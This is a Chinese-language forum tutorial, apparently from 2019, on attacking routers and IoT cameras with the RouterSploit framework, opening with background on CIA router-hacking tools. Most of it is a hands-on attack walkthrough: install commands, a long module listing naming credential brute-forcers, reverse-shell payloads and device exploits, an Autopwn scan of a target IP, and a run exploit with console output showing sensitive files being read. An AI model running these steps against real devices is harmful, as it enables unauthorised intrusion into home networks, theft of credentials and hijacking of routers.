-
-
[原创]使用 RouterSploit 攻击路由器的方法介绍
-
2019-4-16 15:00
-
路由器是网络连接的核心设备,但是普通用户并不会太注意路由器的安全配置问题。老的设备固件系统,默认弱口令密码和其他配置问题都会被黑客利用。而且这些利用漏洞非常简单,以至于创建自动化工具来利用这些漏洞就变得轻而易举。
在这篇文章中,我会讲述如何使用RouterSploit,这是一种自动化路由器漏洞利用工具。
路由器漏洞利用的基础知识
路由器漏洞利用的原理是破坏路由器的Wi-Fi安全性,绕过管理登录页面和访问管理功能。然后,熟练的攻击者可以在“rootkitting”中定位路由器的固件信息,其中自定义的固件信息可以被用于高级恶意功能。
根据攻击者的攻击目标分析,攻击可能包括监视用户和连接的设备,将恶意软件注入Web管理中以利用连接的设备,实现高级鱼叉式网络钓鱼攻击,并通过被利用的路由器为非法流量路由提供犯罪活动。
Cherry Blossom路由器漏洞利用工具
美国国家安全局和中央情报局等政府机构对路由器漏洞进行了囤积,ShadowBrokers在Window SMB漏洞被利用于WanaCry病毒之后发布这些路由器漏洞。现在像Cherry Blossom这样的工具在以后可能会成为路由器漏洞主流工具。
NSA和CIA的这些工具可以控制受感染路由器所在的整个局域网络,可以将它们转换为先进的无线间谍设备。
Cherry Blossom是一个rootkitting框架,其中路由器被自动利用并转换为“flytraps”。 flytraps 是一种被使用特殊固件更新的路由器,可以防止用户更新或修改新固件,被黑客广泛使用。
Cherry Blossom路由器漏洞利用工具可以控制许多“ flytraps ( 捕蝇草 )”,称为访问位于家中或目标网络中的间谍设备。
flytraps (
捕蝇草
)将“
beacon
”回连到“Cherryweb”的命令和控制服务器,然后由操作者通过加密的VPN隧道分配“任务”。高级模块下,比如“Windex”,可以对任何连接的目标执行恶意软件攻击,可以将
flytraps (捕蝇草)
变成一个能够从任何地方进行控制的高级远程间谍平台。
如图是Cherry Blossom显示要发送到
flytraps (捕蝇草)
设备的任务命令,包括shell代码,侦察脚本和漏洞利用代码
路由器黑客攻击活动
除了CIA关注的间谍工具之外,可以被利用的路由器和物联网设备因其路由能力而成为重要目标。RouterSploit,今天要使用的工具,不仅可以攻击路由器,它还可以用于网络摄像头和其他连接设备。
虽然CIA使用VPN连接来分析和控制服务器之间的流量,但网络犯罪分子将使用这些设备代理恶意流量以避免检测。实际上,这些被感染的路由器和物联网设备的网络作为代理攻击工具在黑市被出售,用于隐藏信用卡盗窃,暗网交易和DDoS攻击等非法活动。
路由器黑客攻击实战入门
如果拿到路由器的控制权,你将拥有对网络的完全访问权限。你可以控制目标设备的网络状况并将其路由到你想要的任何地或任何地方,或转发端口以进行远程访问。
初学者只需在RouterSploit上运行Autopwn扫描程序,也会自动检测出针对目标IP地址的一系列漏洞。
什么是RouterSploit?
RouterSploit是一个用Python写的框架,可以自动完成与路由器相关的大多数漏洞利用任务。它以Metasploit为模型,任何习惯Metasploit框架的人都会熟悉它的命令。它包含扫描和利用模块,可用于Kali Linux安装下载
与目标网络联网后,扫描后将显示是否可以通过框架轻松利用路由器,我将通过Autopwn功能快速识别路由器和连接设备上的漏洞。
安装准备
RouterSploit可以在Kali Linux下安装,也可以在Kali Raspberry Pi,macOS或Mac OS X,Windows上运行,甚至可以在root后的Android手机上运行。首先,我们需要处理一些依赖项并确保安装了Python。
第1步:安装Python和依赖项
需要确保安装了Python,并且您还需要以下一些软件包。
Python3 (with pip) Requests Paramiko Beautifulsoup4 Pysnmp Gnureadline (macOS / Mac OS X only)
你可以使用apt-get安装它们:
apt-get install python3-pip requests paramiko beautifulsoup4 pysnmp
第2步:在Mac,Kali上安装RouterSploit
要在Kali Linux上安装,请打开终端窗口并键入以下命令:
git clone https://github.com/threat9/routersploit cd routersploit python3 -m pip install -r requirements.txt python3 rsf.py
在macOS或Mac OS X上,方法类似。在终端窗口中,键入:
git clone https://github.com/threat9/routersploit cd routersploit sudo easy_install pip sudo pip install -r requirements.txt
第3步:运行RouterSploit
首次运行请将计算机连接到有你要扫描的路由器的网络中,导航到RouterSploit文件夹并通过键入以下命令运行RouterSploit。
cd cd routersploit sudo python ./rsf.py
RouterSploit框架界面风格和Metasploit框架很相似
命令行界面可以输入简单的命令来扫描和利用路由器漏洞,可以通过键入以下命令查看RouterSploit提供的所有功能:
show all
下面的输出中看到的有很多漏洞利用代码和扫描脚本
creds/generic/snmp_bruteforce creds/generic/telnet_default creds/generic/ssh_default creds/generic/ftp_bruteforce creds/generic/http_basic_digest_bruteforce creds/generic/ftp_default creds/generic/http_basic_digest_default creds/generic/ssh_bruteforce creds/generic/telnet_bruteforce creds/routers/ipfire/ssh_default_creds creds/routers/ipfire/telnet_default_creds creds/routers/ipfire/ftp_default_creds creds/routers/bhu/ssh_default_creds creds/routers/bhu/telnet_default_creds creds/routers/bhu/ftp_default_creds creds/routers/linksys/ssh_default_creds creds/routers/linksys/telnet_default_creds creds/routers/linksys/ftp_default_creds creds/routers/technicolor/ssh_default_creds creds/routers/technicolor/telnet_default_creds creds/routers/technicolor/ftp_default_creds creds/routers/asus/ssh_default_creds creds/routers/asus/telnet_default_creds creds/routers/asus/ftp_default_creds creds/routers/billion/ssh_default_creds creds/routers/billion/telnet_default_creds creds/routers/billion/ftp_default_creds creds/routers/zte/ssh_default_creds creds/routers/zte/telnet_default_creds creds/routers/zte/ftp_default_creds creds/routers/ubiquiti/ssh_default_creds creds/routers/ubiquiti/telnet_default_creds creds/routers/ubiquiti/ftp_default_creds creds/routers/asmax/ssh_default_creds creds/routers/asmax/telnet_default_creds creds/routers/asmax/ftp_default_creds creds/routers/asmax/webinterface_http_auth_default_creds creds/routers/huawei/ssh_default_creds creds/routers/huawei/telnet_default_creds creds/routers/huawei/ftp_default_creds creds/routers/tplink/ssh_default_creds creds/routers/tplink/telnet_default_creds creds/routers/tplink/ftp_default_creds creds/routers/netgear/ssh_default_creds creds/routers/netgear/telnet_default_creds creds/routers/netgear/ftp_default_creds creds/routers/mikrotik/ssh_default_creds creds/routers/mikrotik/telnet_default_creds creds/routers/mikrotik/ftp_default_creds creds/routers/mikrotik/api_ros_default_creds creds/routers/movistar/ssh_default_creds creds/routers/movistar/telnet_default_creds creds/routers/movistar/ftp_default_creds creds/routers/dlink/ssh_default_creds creds/routers/dlink/telnet_default_creds creds/routers/dlink/ftp_default_creds creds/routers/juniper/ssh_default_creds creds/routers/juniper/telnet_default_creds creds/routers/juniper/ftp_default_creds creds/routers/comtrend/ssh_default_creds creds/routers/comtrend/telnet_default_creds creds/routers/comtrend/ftp_default_creds creds/routers/fortinet/ssh_default_creds creds/routers/fortinet/telnet_default_creds creds/routers/fortinet/ftp_default_creds creds/routers/belkin/ssh_default_creds creds/routers/belkin/telnet_default_creds creds/routers/belkin/ftp_default_creds creds/routers/netsys/ssh_default_creds creds/routers/netsys/telnet_default_creds creds/routers/netsys/ftp_default_creds creds/routers/pfsense/ssh_default_creds creds/routers/pfsense/webinterface_http_form_default_creds creds/routers/zyxel/ssh_default_creds creds/routers/zyxel/telnet_default_creds creds/routers/zyxel/ftp_default_creds creds/routers/thomson/ssh_default_creds creds/routers/thomson/telnet_default_creds creds/routers/thomson/ftp_default_creds creds/routers/netcore/ssh_default_creds creds/routers/netcore/telnet_default_creds creds/routers/netcore/ftp_default_creds creds/routers/cisco/ssh_default_creds creds/routers/cisco/telnet_default_creds creds/routers/cisco/ftp_default_creds creds/cameras/grandstream/ssh_default_creds creds/cameras/grandstream/telnet_default_creds creds/cameras/grandstream/ftp_default_creds creds/cameras/basler/ssh_default_creds creds/cameras/basler/webinterface_http_form_default_creds creds/cameras/basler/telnet_default_creds creds/cameras/basler/ftp_default_creds creds/cameras/avtech/ssh_default_creds creds/cameras/avtech/telnet_default_creds creds/cameras/avtech/ftp_default_creds creds/cameras/vacron/ssh_default_creds creds/cameras/vacron/telnet_default_creds creds/cameras/vacron/ftp_default_creds creds/cameras/acti/ssh_default_creds creds/cameras/acti/webinterface_http_form_default_creds creds/cameras/acti/telnet_default_creds creds/cameras/acti/ftp_default_creds creds/cameras/sentry360/ssh_default_creds creds/cameras/sentry360/telnet_default_creds creds/cameras/sentry360/ftp_default_creds creds/cameras/siemens/ssh_default_creds creds/cameras/siemens/telnet_default_creds creds/cameras/siemens/ftp_default_creds creds/cameras/american_dynamics/ssh_default_creds creds/cameras/american_dynamics/telnet_default_creds creds/cameras/american_dynamics/ftp_default_creds creds/cameras/videoiq/ssh_default_creds creds/cameras/videoiq/telnet_default_creds creds/cameras/videoiq/ftp_default_creds creds/cameras/jvc/ssh_default_creds creds/cameras/jvc/telnet_default_creds creds/cameras/jvc/ftp_default_creds creds/cameras/speco/ssh_default_creds creds/cameras/speco/telnet_default_creds creds/cameras/speco/ftp_default_creds creds/cameras/iqinvision/ssh_default_creds creds/cameras/iqinvision/telnet_default_creds creds/cameras/iqinvision/ftp_default_creds creds/cameras/avigilon/ssh_default_creds creds/cameras/avigilon/telnet_default_creds creds/cameras/avigilon/ftp_default_creds creds/cameras/canon/ssh_default_creds creds/cameras/canon/telnet_default_creds creds/cameras/canon/ftp_default_creds creds/cameras/canon/webinterface_http_auth_default_creds creds/cameras/hikvision/ssh_default_creds creds/cameras/hikvision/telnet_default_creds creds/cameras/hikvision/ftp_default_creds creds/cameras/dlink/ssh_default_creds creds/cameras/dlink/telnet_default_creds creds/cameras/dlink/ftp_default_creds creds/cameras/honeywell/ssh_default_creds creds/cameras/honeywell/telnet_default_creds creds/cameras/honeywell/ftp_default_creds creds/cameras/samsung/ssh_default_creds creds/cameras/samsung/telnet_default_creds creds/cameras/samsung/ftp_default_creds creds/cameras/axis/ssh_default_creds creds/cameras/axis/telnet_default_creds creds/cameras/axis/ftp_default_creds creds/cameras/axis/webinterface_http_auth_default_creds creds/cameras/arecont/ssh_default_creds creds/cameras/arecont/telnet_default_creds creds/cameras/arecont/ftp_default_creds creds/cameras/brickcom/ssh_default_creds creds/cameras/brickcom/telnet_default_creds creds/cameras/brickcom/ftp_default_creds creds/cameras/brickcom/webinterface_http_auth_default_creds creds/cameras/mobotix/ssh_default_creds creds/cameras/mobotix/telnet_default_creds creds/cameras/mobotix/ftp_default_creds creds/cameras/geovision/ssh_default_creds creds/cameras/geovision/telnet_default_creds creds/cameras/geovision/ftp_default_creds creds/cameras/stardot/ssh_default_creds creds/cameras/stardot/telnet_default_creds creds/cameras/stardot/ftp_default_creds creds/cameras/cisco/ssh_default_creds creds/cameras/cisco/telnet_default_creds creds/cameras/cisco/ftp_default_creds payloads/perl/bind_tcp payloads/perl/reverse_tcp payloads/python/bind_tcp payloads/python/reverse_tcp payloads/python/bind_udp payloads/python/reverse_udp payloads/mipsbe/bind_tcp payloads/mipsbe/reverse_tcp payloads/armle/bind_tcp payloads/armle/reverse_tcp payloads/x86/bind_tcp payloads/x86/reverse_tcp payloads/php/bind_tcp payloads/php/reverse_tcp payloads/cmd/php_reverse_tcp payloads/cmd/python_reverse_tcp payloads/cmd/python_bind_tcp payloads/cmd/perl_reverse_tcp payloads/cmd/netcat_reverse_tcp payloads/cmd/awk_reverse_tcp payloads/cmd/awk_bind_tcp payloads/cmd/bash_reverse_tcp payloads/cmd/php_bind_tcp payloads/cmd/awk_bind_udp payloads/cmd/netcat_bind_tcp payloads/cmd/perl_bind_tcp payloads/cmd/python_reverse_udp payloads/cmd/python_bind_udp payloads/x64/bind_tcp payloads/x64/reverse_tcp payloads/mipsle/bind_tcp payloads/mipsle/reverse_tcp scanners/autopwn scanners/misc/misc_scan scanners/routers/router_scan scanners/cameras/camera_scan exploits/generic/shellshock exploits/generic/ssh_auth_keys exploits/generic/heartbleed exploits/misc/asus/b1m_projector_rce exploits/misc/wepresent/wipg1000_rce exploits/misc/miele/pg8528_path_traversal exploits/routers/ipfire/ipfire_oinkcode_rce exploits/routers/ipfire/ipfire_proxy_rce exploits/routers/ipfire/ipfire_shellshock exploits/routers/2wire/gateway_auth_bypass exploits/routers/2wire/4011g_5012nv_path_traversal exploits/routers/bhu/bhu_urouter_rce exploits/routers/linksys/1500_2500_rce exploits/routers/linksys/smartwifi_password_disclosure exploits/routers/linksys/wrt100_110_rce exploits/routers/linksys/wap54gv3_rce exploits/routers/technicolor/tg784_authbypass exploits/routers/technicolor/tc7200_password_disclosure_v2 exploits/routers/technicolor/dwg855_authbypass exploits/routers/technicolor/tc7200_password_disclosure exploits/routers/asus/infosvr_backdoor_rce exploits/routers/asus/rt_n16_password_disclosure exploits/routers/billion/billion_5200w_rce exploits/routers/billion/billion_7700nr4_password_disclosure exploits/routers/zte/f460_f660_backdoor exploits/routers/zte/zxv10_rce exploits/routers/ubiquiti/airos_6_x exploits/routers/asmax/ar_1004g_password_disclosure exploits/routers/asmax/ar_804_gu_rce exploits/routers/huawei/hg520_info_dislosure exploits/routers/huawei/hg866_password_change exploits/routers/huawei/hg530_hg520b_password_disclosure exploits/routers/huawei/e5331_mifi_info_disclosure exploits/routers/tplink/wdr740nd_wdr740n_backdoor exploits/routers/tplink/archer_c2_c20i_rce exploits/routers/tplink/wdr740nd_wdr740n_path_traversal exploits/routers/tplink/wdr842nd_wdr842n_configure_disclosure exploits/routers/netgear/jnr1010_path_traversal exploits/routers/netgear/n300_auth_bypass exploits/routers/netgear/multi_password_disclosure-2017-5521 exploits/routers/netgear/dgn2200_dnslookup_cgi_rce exploits/routers/netgear/prosafe_rce exploits/routers/netgear/r7000_r6400_rce exploits/routers/netgear/multi_rce exploits/routers/netgear/wnr500_612v3_jnr1010_2010_path_traversal exploits/routers/netgear/dgn2200_ping_cgi_rce exploits/routers/mikrotik/routeros_jailbreak exploits/routers/movistar/adsl_router_bhs_rta_path_traversal exploits/routers/dlink/dsp_w110_rce exploits/routers/dlink/dgs_1510_add_user exploits/routers/dlink/dir_645_815_rce exploits/routers/dlink/dir_815_850l_rce exploits/routers/dlink/dir_300_320_615_auth_bypass exploits/routers/dlink/dir_645_password_disclosure exploits/routers/dlink/dir_850l_creds_disclosure exploits/routers/dlink/dvg_n5402sp_path_traversal exploits/routers/dlink/dsl_2640b_dns_change exploits/routers/dlink/dcs_930l_auth_rce exploits/routers/dlink/dir_825_path_traversal exploits/routers/dlink/multi_hedwig_cgi_exec exploits/routers/dlink/dns_320l_327l_rce exploits/routers/dlink/dsl_2730_2750_path_traversal exploits/routers/dlink/dsl_2750b_info_disclosure exploits/routers/dlink/dir_300_600_rce exploits/routers/dlink/dwl_3200ap_password_disclosure exploits/routers/dlink/dsl_2740r_dns_change exploits/routers/dlink/dir_8xx_password_disclosure exploits/routers/dlink/dwr_932b_backdoor exploits/routers/dlink/dsl_2730b_2780b_526b_dns_change exploits/routers/dlink/dwr_932_info_disclosure exploits/routers/dlink/dir_300_320_600_615_info_disclosure exploits/routers/dlink/dsl_2750b_rce exploits/routers/dlink/multi_hnap_rce exploits/routers/dlink/dir_300_645_815_upnp_rce exploits/routers/3com/ap8760_password_disclosure exploits/routers/3com/imc_path_traversal exploits/routers/3com/officeconnect_rce exploits/routers/3com/officeconnect_info_disclosure exploits/routers/3com/imc_info_disclosure exploits/routers/comtrend/ct_5361t_password_disclosure exploits/routers/fortinet/fortigate_os_backdoor exploits/routers/multi/rom0 exploits/routers/multi/tcp_32764_rce exploits/routers/multi/misfortune_cookie exploits/routers/multi/tcp_32764_info_disclosure exploits/routers/multi/gpon_home_gateway_rce exploits/routers/belkin/g_plus_info_disclosure exploits/routers/belkin/play_max_prce exploits/routers/belkin/n150_path_traversal exploits/routers/belkin/n750_rce exploits/routers/belkin/g_n150_password_disclosure exploits/routers/belkin/auth_bypass exploits/routers/netsys/multi_rce exploits/routers/shuttle/915wm_dns_change exploits/routers/zyxel/d1000_rce exploits/routers/zyxel/p660hn_t_v2_rce exploits/routers/zyxel/d1000_wifi_password_disclosure exploits/routers/zyxel/zywall_usg_extract_hashes exploits/routers/zyxel/p660hn_t_v1_rce exploits/routers/thomson/twg850_password_disclosure exploits/routers/thomson/twg849_info_disclosure exploits/routers/netcore/udp_53413_rce exploits/routers/cisco/secure_acs_bypass exploits/routers/cisco/catalyst_2960_rocem exploits/routers/cisco/ucs_manager_rce exploits/routers/cisco/unified_multi_path_traversal exploits/routers/cisco/firepower_management60_path_traversal exploits/routers/cisco/firepower_management60_rce exploits/routers/cisco/video_surv_path_traversal exploits/routers/cisco/dpc2420_info_disclosure exploits/routers/cisco/ios_http_authorization_bypass exploits/routers/cisco/ucm_info_disclosure exploits/cameras/grandstream/gxv3611hd_ip_camera_sqli exploits/cameras/grandstream/gxv3611hd_ip_camera_backdoor exploits/cameras/mvpower/dvr_jaws_rce exploits/cameras/siemens/cvms2025_credentials_disclosure exploits/cameras/avigilon/videoiq_camera_path_traversal exploits/cameras/xiongmai/uc_httpd_path_traversal exploits/cameras/dlink/dcs_930l_932l_auth_bypass exploits/cameras/honeywell/hicc_1100pt_password_disclosure exploits/cameras/brickcom/corp_network_cameras_conf_disclosure exploits/cameras/brickcom/users_cgi_creds_disclosure exploits/cameras/multi/P2P_wificam_credential_disclosure exploits/cameras/multi/dvr_creds_disclosure exploits/cameras/multi/jvc_vanderbilt_honeywell_path_traversal exploits/cameras/multi/netwave_ip_camera_information_disclosure exploits/cameras/multi/P2P_wificam_rce generic/bluetooth/btle_enumerate generic/bluetooth/btle_scan generic/bluetooth/btle_write generic/upnp/ssdp_msearch rsf >
首先将开始对目标路由器进行扫描,将检查路由器的每个漏洞是否可以被利用,它将在扫描结束时返回一个列表,其中包含对目标有效的每个漏洞。
第4步:扫描目标
我们将使用Autopwn扫描程序查找适用于我们目标的任何漏洞,找到路由器的IP地址并保存下来,大多数情况下,路由器的默认IP为192.168.0.1,但这可以改,如果你不知道,可以使用Fing或ARP扫描查找IP地址。
启动RouterSploit后,键入以下命令进入Autopwn模块:
use scanners/autopwn show options
rsf > use scanners/autopwn rsf (AutoPwn) > show options Target options: Name Current settings Description ---- ---------------- ----------- target Target IPv4 or IPv6 address Module options: Name Current settings Description ---- ---------------- ----------- http_port 80 Target Web Interface Port http_ssl false HTTPS enabled: true/false ftp_port 21 Target FTP port (default: 21) ftp_ssl false FTPS enabled: true/false ssh_port 22 Target SSH port (default: 22) telnet_port 23 Target Telnet port (default: 23) threads 8
在这种情况下,我们将目标设置为路由器的IP地址。键入set target,然后键入路由器的IP地址,然后按enter键。最后,键入run以开始扫描。
rsf (AutoPwn) > set target 10.11.0.4
[+] {'target': '10.11.0.4'}
rsf (AutoPwn) > run
第5步:选择和配置EXP
扫描完成后,将显示它找到的漏洞列表,可以从此列表中选择最适合我们需求的漏洞。在这里,我们看到一个具有许多漏洞的路由器。
[*] Elapsed time: ``9.301568031 seconds [*] Could not verify exploitability: - exploits/routers/billion/5200w_rce - exploits/routers/cisco/catalyst_2960_rocem - exploits/routers/cisco/secure_acs_bypass - exploits/routers/dlink/dir_815_8501_rce - exploits/routers/dlink/dsl_2640b_dns_change - exploits/routers/dlink/dsl_2730b_2780b_526_dns_change - exploits/routers/dlink/dsl_2740r_dns_change - exploits/routers/netgear/dgn2200_dnslookup_cgi_rce - exploits/routers/shuttle/915wm_dns_change [*] Device is vulnerable: - exploits/routers/3com/3crads172_info_disclosure - exploits/routers/3com/officialconnect_rce - exploits/routers/dlink/dcs_9301_auto_rce - exploits/routers/dlink/dir_300_600_rce - exploits/routers/ipfire/ipfire_proxy_rce - exploits/routers/linksys/1500_2500_rce - exploits/routers/netgear/prosafe_rce - exploits/routers/zyxel/zywall_usg_extract_hashes - exploits/routers/dlink/dcs_9301_9321_authbypass rsf (AutoPwn) >
use exploits/routers/3com/3cradsl72_info_disclosure show options
将出现一个变量列表,可以通过键入以下内容来设置目标:
set target <target router IP> check
设置目标IP
rsf (AutoPwn) > use exploits/routers/3com/3cradsl72_info_disclosure
show options
rsf (3Com 3CRADSL72 Info Disclosure) > show options
Target options:
Name Current settings Description
---- ---------------- -----------
target Target IPv4 or IPv6 address
rsf (3Com 3CRADSL72 Info Disclosure) > set target 10.11.0.4
[+] {'target': '10.11.0.4'}
rsf (3Com 3CRADSL72 Info Disclosure) > check
/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7.site-package ... reRequestWarning: Unverified HTTPS request is being made. Adding certificate https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings InsecureRequestWarning)
[+] Target is vulnerable
rsf (3Com 3CRADSL72 Info Disclosure) >
第6步:运行漏洞利用代码
输入run,进行攻击:
rsf (3Com 3CRADSL72 Info Disclosure) > run [*] Running module... [*] Sending request to download sensitive information /Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7.site-package ... reRequestWarning: Unverified HTTPS request is being made. Adding certificate https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings InsecureRequestWarning) [+] Exploit success [*] Reading /app_sta.stm file <!doctype html> <html > <!-- _#####____####___######___####___####___##______######__#####__ _##__##__##__##__##______##_____##______##______##______##__##_ _#####___######__####_____####___####___##______####____#####__ _##______##__##__##__________##_____##__##______##______##__##_ _##______##__##__######___####___####___######__######__##__##_ We are hiring software developers! https://www.paessler.com/jobs --> <head> <link rel="manifest" href="/public/manifest.json.htm"> <meta httlp-equiv="X-UA-Compatible" content="IE-edge,chrome=1"> <meta name="viewport" content="width=device-width.initial-scale">
如果漏洞利用成功,你应该会看到内部配置设置,这些设置可能会泄漏用户的登录名和密码,默认密码和设备序列号,以及其他允许破坏路由器的设置。其他模块可以远程注入代码或直接拿到 路由器密码。
个人github博客地址:
https://github.com/streetleague/0xbird.github.io/
个人安全研究公众号平台:
[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法
最后于 2019-7-12 15:38
被0xbird编辑
,原因:
|
|
|---|---|
|
|
|
|
|
|
|
|
感谢
|
|
|
谢谢分享
|
|
|
|
